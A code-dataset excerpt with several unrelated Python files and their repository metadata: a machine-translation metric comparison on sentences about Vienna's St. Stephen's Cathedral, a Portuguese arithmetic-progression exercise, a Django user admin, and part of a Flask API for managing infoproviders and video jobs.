"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "The name is given to St. Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrocinium is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west facade, flanked by the two pagan towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "The St. Stephen's Cathedral has four towers: At 136.4 meters the highest is the South Tower, the North Tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the cathedral of St. Mary's Conception in Linz was built two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The South Tower is an architectural masterpiece of the time; Despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which are the main bells of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the North Tower under a Renaissance tower hood since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"Watson Language Translator":
[
{
"translation": "The St. Stephen's Cathedral (Cathedral and Metropolitan Church of St. Stephan and all the saints) at Vienna's Stephansplatz (district of the inner city) has been the cathedral church (seat of a cathedral chapter) since 1365, since 1469/1479 cathedral (bishop's seat) and since 1723 Metropolitan Church of the Archbishop of Vienna",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also known as Steffl, is known as the landmark of Vienna and is sometimes referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "Its name is Saint Stephen, who is the first Christian martyr to be a martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second Patrozinium is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west facade, flanked by the two Heidenürmen, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, the St. Stephen's Cathedral has four towers: the highest with 136.4 meters is the south tower, the north tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Mariä-conception-Dom in Linz was built by two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; in spite of its remarkable height, the foundation is less than four metres deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main building of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a tower hood dating back to the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"Yandex Translate":
[
{
"translation": "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and All Saints) on Vienna's Stephansplatz (district Inner City) has been cathedral church (seat of a cathedral chapter) since 1365, cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "It is named after Saint Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrocinium is All Saints ' Day",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the Late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the western facade, flanked by the two pagan towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, St. Stephen's Cathedral has four towers: the tallest with 136.4 meters is the south Tower, the north tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Conception of the Virgin Mary in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south Tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main ringing of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the North Tower under a Renaissance-era tower hood since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
}
translations2 = deepcopy(translations)
for translation in translations:
for sentence in translations[translation]:
sentence["translation"] = sentence["translation"].replace(".", " . ").split()
for idx, reference in enumerate(sentence["references"]):
sentence["references"][idx] = reference.replace(".", " . ").split()
for service in translations:
print(service)
hypotheses_split = [translations[service][0]["translation"], translations[service][1]["translation"]]
references_split = [translations[service][0]["references"], translations[service][1]["references"]]
hypotheses = [translations2[service][0]["translation"], translations2[service][1]["translation"]]
references = [translations2[service][0]["references"], translations2[service][1]["references"]]
# BLEU, 0 = bad, 1 = good
print("BLEU: " + str(corpus_bleu(references_split, hypotheses_split)))
# NIST
print("NIST: " + str(corpus_nist(references_split, hypotheses_split, 3)))
# METEOR
avg_score = 0
for idx, hypothesis in enumerate(hypotheses):
avg_score += meteor_score(references[idx], hypothesis)
avg_score /= len(hypotheses)
print("METEOR: " + str(avg_score))
# GLEU
print("GLEU: " + str(corpus_gleu(references_split, hypotheses_split)))
# TER
refs_split = [[], []]
for reference in references_split: # all elements in references_split have to have the same length
for idx in range(len(reference)):
refs_split[idx].append(reference[idx])
avg_score = 0
for ref in refs_split:
for r, hyp in zip(ref, hypotheses_split):
avg_score += ter(r, hyp)
avg_score /= len(refs_split)
avg_score /= len(hypotheses)
print("TER: " + str(avg_score))
# RIBES
print("RIBES: " + str(corpus_ribes(references_split, hypotheses_split)))
# ChrF
avg_score = 0
for ref in refs_split:
avg_score += corpus_chrf(ref, hypotheses_split)
avg_score /= len(refs_split)
print("ChrF: " + str(avg_score))
print("")
| 97.846986 | 625 | 0.726634 |
a37d0692728b7b2bf7381bc45be509f6afdc4ea7
| 388 |
py
|
Python
|
Python/Exercícios_Python/052_progressão_aritmética.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/052_progressão_aritmética.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/052_progressão_aritmética.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""052 - Progressão Aritmética
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1XxsY2LOjklht2ABKc1B0VXPOppV9E7Dh
"""
num = int(input('\nDigite o Primeiro número da PA: '))
razão = int(input('Digite a Razão da PA: '))
for c in range(1, 11):
print(num, end=' ')
num += razão
print('Acabou')
| 25.866667 | 77 | 0.688144 |
289c9a1594a760f168991c2dc18e5e74ce3cfb9d
| 2,515 |
py
|
Python
|
apps/user/admin.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 2 |
2018-05-18T08:38:29.000Z
|
2018-05-22T08:26:09.000Z
|
apps/user/admin.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 118 |
2017-10-31T13:45:09.000Z
|
2018-02-24T20:51:42.000Z
|
apps/user/admin.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | null | null | null |
""" License
MIT License
Copyright (c) 2017 OpenAdaptronik
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from django.contrib import admin
from django.contrib.auth import admin as auth_admin
from django.contrib.auth.models import Group
from django.utils.translation import gettext_lazy as _
from .models import User
# Unregister the default group admin model.
admin.site.unregister(Group)
@admin.register(User)
class UserAdmin(auth_admin.UserAdmin):
""" The user admin model.
Overwrites the default django.contrib.auth.admin.UserAdmin
Admin model to manipulate the users in the database.
Attributes:
See django.contrib.auth.models.AbstractUser.
fieldsets: The fieldset to show in the admin.
list_display: The data to show in the user list.
add_fieldsets: The data to show in the user creation.
"""
# Filter Funktion des Users im Profile/admin.py
fieldsets = (
(None, {'fields': ('username', 'email', 'password')}),
(_('permissions'), {'fields': ('is_active', 'is_superuser', 'is_staff')}),
(_('important dates'), {'fields': ('last_login', 'date_joined')}),
(_('name'), {'fields': ('last_name', 'first_name')}),
)
list_display = ('username', 'email', 'is_superuser','is_active', 'date_joined', 'last_login', )
list_filter = ('is_superuser', 'is_active')
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', 'email', 'password1', 'password2'),
}),
)
| 34.930556 | 99 | 0.71332 |
95de10b35f36d0ae9b8107f3312c8a02cbd6a865
| 42,950 |
py
|
Python
|
src/visuanalytics/server/api/api.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 1 |
2020-11-27T17:26:27.000Z
|
2020-11-27T17:26:27.000Z
|
src/visuanalytics/server/api/api.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 85 |
2021-01-02T11:38:59.000Z
|
2021-07-26T07:13:47.000Z
|
src/visuanalytics/server/api/api.py
|
Biebertal-mach-mit-TV/Data-Analytics
|
70cda2393e61f7ca0a1a4a5965646e908bd0faa9
|
[
"MIT"
] | 1 |
2021-04-19T06:50:53.000Z
|
2021-04-19T06:50:53.000Z
|
"""
Enthält die API-Endpunkte.
Alle Endpunkte liefern im Fehlerfall einen Key 'err_msg'.
"""
import flask
import logging
from flask import (Blueprint, request, send_file, send_from_directory)
from werkzeug.utils import secure_filename
from os import path
from datetime import datetime
from visuanalytics.server.db import db, queries
from visuanalytics.analytics.processing.image.matplotlib.diagram import generate_test_diagram
from visuanalytics.util.resources import TEMP_LOCATION, get_resource_path, get_temp_path
from visuanalytics.util.config_manager import get_private, set_private
from ast2json import str2json
from base64 import b64encode
from visuanalytics.analytics.apis.checkapi import check_api
logger = logging.getLogger()
api = Blueprint('api', __name__)
@api.teardown_app_request
def close_db_con(exception):
db.close_con_f()
@api.route("/testdiagram", methods=["POST"])
def test_diagram():
"""
Endpunkt `/testdiagram`.
Erzeugt ein Testbild mit Zufallswerten zu einem Diagramm.
Das übermittelte JSON sollte die gleiche Struktur besitzen wie beim Erstellen eines Infoproviders.
Die Response enthält das generierte Bild als BLOB-File.
"""
diagram_info = request.json
try:
file_path = generate_test_diagram(diagram_info)
return send_file(file_path, "application/json", True)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while generating a test-diagram"})
return err, 400
@api.route("/checkapi", methods=["POST"])
def checkapi():
"""
Endpunkt `/checkapi`.
Das Übermittelte JSON enthält die API-Daten mit den Keys 'url', 'api_key' und 'has_key'.
Die Response enthält alle Keys und deren Typen, die bei der gegebenen API abgefragt werden können.
"""
api_info = request.json
try:
if "api_info" not in api_info:
err = flask.jsonify({"err_msg": "Missing field 'api'"})
return err, 400
if "api_key_name" not in api_info["api_info"]:
err = flask.jsonify({"err_msg": "Missing API-Key"})
return err, 400
if "url_pattern" not in api_info["api_info"]:
err = flask.jsonify({"err_msg": "Missing URL"})
return err, 400
if "method" not in api_info:
err = flask.jsonify({"err_msg": "Missing Field 'method'"})
return err, 400
if "response_type" not in api_info:
err = flask.jsonify({"err_msg": "Missing field 'response_type'"})
return err, 400
header, parameter = queries.generate_request_dicts(api_info["api_info"], api_info["method"])
url, params = queries.update_url_pattern(api_info["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"method": api_info["api_info"].get("method", "get"),
"url": url,
"headers": header,
"params": parameter,
"response_type": api_info["response_type"]
}
keys, success = check_api(req_data)
return flask.jsonify({"status": 0, "api_keys": keys}) if success else flask.jsonify({"status": 1, "api_keys": keys})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while checking a new api"})
return err, 400
@api.route("/infoprovider", methods=["POST"])
def add_infoprovider():
"""
Endpunkt `/infoprovider`.
Route zum Hinzufügen eines Infoproviders.
Der übertragene Infoprovider muss die Keys 'infoprovider_name', 'diagrams', 'diagrams_original' sowie einen Key
'datasources', welcher alle Datenquellen beinhaltet, enthalten.
"""
infoprovider = request.json
try:
if "infoprovider_name" not in infoprovider:
err = flask.jsonify({"err_msg": "Missing Infoprovider-Name"})
return err, 400
if "datasources" not in infoprovider:
err = flask.jsonify({"err_msg": "Missing Datasources"})
return err, 400
if "diagrams" not in infoprovider:
err = flask.jsonify({"err_msg": "Missing field 'diagrams'"})
return err, 400
if "diagrams_original" not in infoprovider:
err = flask.jsonify({"err_msg": "Missing field 'diagrams_original'"})
return err, 400
for datasource in infoprovider["datasources"]:
if "datasource_name" not in datasource:
err = flask.jsonify({"err_msg": "Missing field 'datasource_name' in a datasource"})
return err, 400
if "api" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'api' in datasource {datasource['name']}"})
return err, 400
if "transform" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'api' in datasource {datasource['name']}"})
return err, 400
if "calculates" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'calculates' for datasource {datasource['name']}"})
return err, 400
if "replacements" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'replacements' for datasource {datasource['name']}"})
return err, 400
if "storing" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'api' in datasource {datasource['name']}"})
return err, 400
if "historized_data" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field schedule for datasource {datasource['name']}"})
return err, 400
if "formulas" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'api' in datasource {datasource['name']}"})
return err, 400
if "schedule" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing schedule for datasource {datasource['name']}"})
return err, 400
if "listItems" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field listItems for datasource {datasource['name']}"})
return err, 400
if not queries.insert_infoprovider(infoprovider):
err = flask.jsonify({"err_msg": f"There already exists an infoprovider with the name "
f"{infoprovider['infoprovider_name']}"})
return err, 400
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding an infoprovider"})
return err, 400
@api.route("/videojob", methods=["POST"])
def add_videojob():
"""
Endpunkt `/videojob`.
Route zum Hinzufügen eines Video-Jobs.
Das übertragene Videojob-JSON muss die Keys 'videojob_name', 'images', 'audio', 'sequence', 'schedule', 'sceneList'
und 'selectedInfoprovider' enthalten.
"""
video = request.json
try:
if "videojob_name" not in video:
err = flask.jsonify({"err_msg": "Missing Videojob-name"})
return err, 400
if "images" not in video:
err = flask.jsonify({"err_msg": "Missing Images"})
return err, 400
if "audio" not in video:
err = flask.jsonify({"err_msg": "Missing Audio"})
return err, 400
if "sequence" not in video:
err = flask.jsonify({"err_msg": "Missing Sequence"})
return err, 400
if "schedule" not in video:
err = flask.jsonify({"err_msg": "Missing Schedule"})
return err, 400
if "sceneList" not in video:
err = flask.jsonify({"err_msg": "Missing field 'sceneList'"})
return err, 400
if "selectedInfoprovider" not in video:
err = flask.jsonify({"err_msg": "Missing field 'selectedInfoProvider'"})
return err, 400
if not queries.insert_video_job(video):
err = flask.jsonify({"err_msg": f"There already exists a video with the name "
f"{video['videojob_name']}"})
return err, 400
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding an video"})
return err, 400
@api.route("/infoprovider/schedules", methods=["GET"])
def show_schedule():
"""
Endpunkt '/infoprovider/schedules'.
Response enthält eine Liste von Einträgen aus der Tabelle "schedule_historisation".
Jeder Eintrag enthält die Keys schedule_historisation_id und den Typ des Schedules.
"""
try:
return flask.jsonify(queries.show_schedule())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading all infoproviders"})
return err, 400
@api.route("/infoprovider/showweekly", methods=["GET"])
def show_weekly():
"""
Endpunkt '/infoprovider/showweekly'.
Response enthält eine Liste von Einträgen aus der Tabelle "schedule_historisation_weekday".
Jeder Eintrag enthält die Keys schedule_historisation_id, schedule_weekday_historisation_id und weekday.
"""
try:
return flask.jsonify(queries.show_weekly())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading all infoproviders"})
return err, 400
@api.route("/infoprovider/all", methods=["GET"])
def get_all_infoproviders():
"""
Endpunkt `/infoproviders`.
Response enthält Informationen über alle, in der Datenbank enthaltenen, Infoprovider.
"""
try:
return flask.jsonify(queries.get_infoprovider_list())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading all infoproviders"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>", methods=["PUT"])
def update_infoprovider(infoprovider_id):
"""
Endpunkt `/infoprovider/<infoprovider_id>`.
Route zum Ändern eines Infoproviders.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
"""
updated_data = request.json
try:
if "infoprovider_name" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Infoprovider-Name"})
return err, 400
if "datasources" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Datasources"})
return err, 400
if "diagrams" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'diagrams'"})
return err, 400
if "diagrams_original" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'diagrams'"})
return err, 400
for datasource in updated_data["datasources"]:
if "datasource_name" not in datasource:
err = flask.jsonify({"err_msg": "Missing field 'name' in a datasource"})
return err, 400
if "api" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'api' in datasource {datasource['name']}"})
return err, 400
if "transform" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'api' in datasource {datasource['name']}"})
return err, 400
if "calculates" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'calculates' for datasource {datasource['name']}"})
return err, 400
if "replacements" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'replacements' for datasource {datasource['name']}"})
return err, 400
if "storing" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'api' in datasource {datasource['name']}"})
return err, 400
if "historized_data" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field schedule for datasource {datasource['name']}"})
return err, 400
if "formulas" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field 'api' in datasource {datasource['name']}"})
return err, 400
if "schedule" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field schedule for datasource {datasource['name']}"})
return err, 400
if "listItems" not in datasource:
err = flask.jsonify({f"err_msg": f"Missing field listItems for datasource {datasource['name']}"})
return err, 400
update_info = queries.update_infoprovider(infoprovider_id, updated_data)
if update_info is not None:
err = flask.jsonify(update_info)
return err, 400
return flask.jsonify({"status": "successful"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while updating an infoprovider"})
return err, 400
@api.route("/videojob/<videojob_id>", methods=["PUT"])
def update_videojob(videojob_id):
"""
Endpunkt `/videojob/<videojob_id>`.
Route zum Ändern eines Video-Jobs.
:param videojob_id: ID des Video-Jobs.
:type videojob_id: int
"""
updated_data = request.json
try:
if "videojob_name" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Videojob-name"})
return err, 400
if "images" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Images"})
return err, 400
if "audio" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Audio"})
return err, 400
if "sequence" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Sequence"})
return err, 400
if "schedule" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Schedule"})
return err, 400
if "sceneList" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'sceneList'"})
return err, 400
if "selectedInfoprovider" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'selectedInfoProvider'"})
return err, 400
update_info = queries.insert_video_job(updated_data, update=True, job_id=videojob_id)
if update_info is not None:
err = flask.jsonify(update_info)
return err, 400
return flask.jsonify({"status": "successful"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while updating a videojob"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>", methods=["GET"])
def get_infoprovider(infoprovider_id):
"""
Endpunkt `/infoprovider/<infoprovider_id>`.
Response enthält die JSON-Datei des Infoproviders.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
"""
try:
infoprovider_json = queries.get_infoprovider(infoprovider_id)
if infoprovider_json is {}:
err = flask.jsonify({"err_msg": "Unknown infoprovider"})
return err, 400
return flask.jsonify(infoprovider_json)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading an Infoprovider"})
return err, 400
@api.route("/videojob/<videojob_id>", methods=["GET"])
def get_videojob(videojob_id):
"""
Endpunkt `/videojob/<videojob_id>`.
Response enthält das Json zum Videojob.
:param videojob_id: ID des Videojobs.
:type videojob_id: int
"""
try:
videojob_json = queries.get_videojob(int(videojob_id))
if videojob_json is {}:
err = flask.jsonify({"err_msg": "Unknown videojob"})
return err, 400
return flask.jsonify(videojob_json)
# return videojob_json
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading a Videojob"})
return err, 400
@api.route("/videojob/all", methods=["GET"])
def get_all_videojobs():
"""
Endpunkt `/videojob/all`.
Route mit der Informationen zu allen Video-Jobs geladen werden können.
Response enthält ein Array mit den Namen und IDs aller Video-Jobs.
"""
try:
return flask.jsonify(queries.get_all_videojobs())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading all Videojobs"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>", methods=["DELETE"])
def delete_infoprovider(infoprovider_id):
"""
Endpunkt `/infoprovider/<infoprovider_id>`.
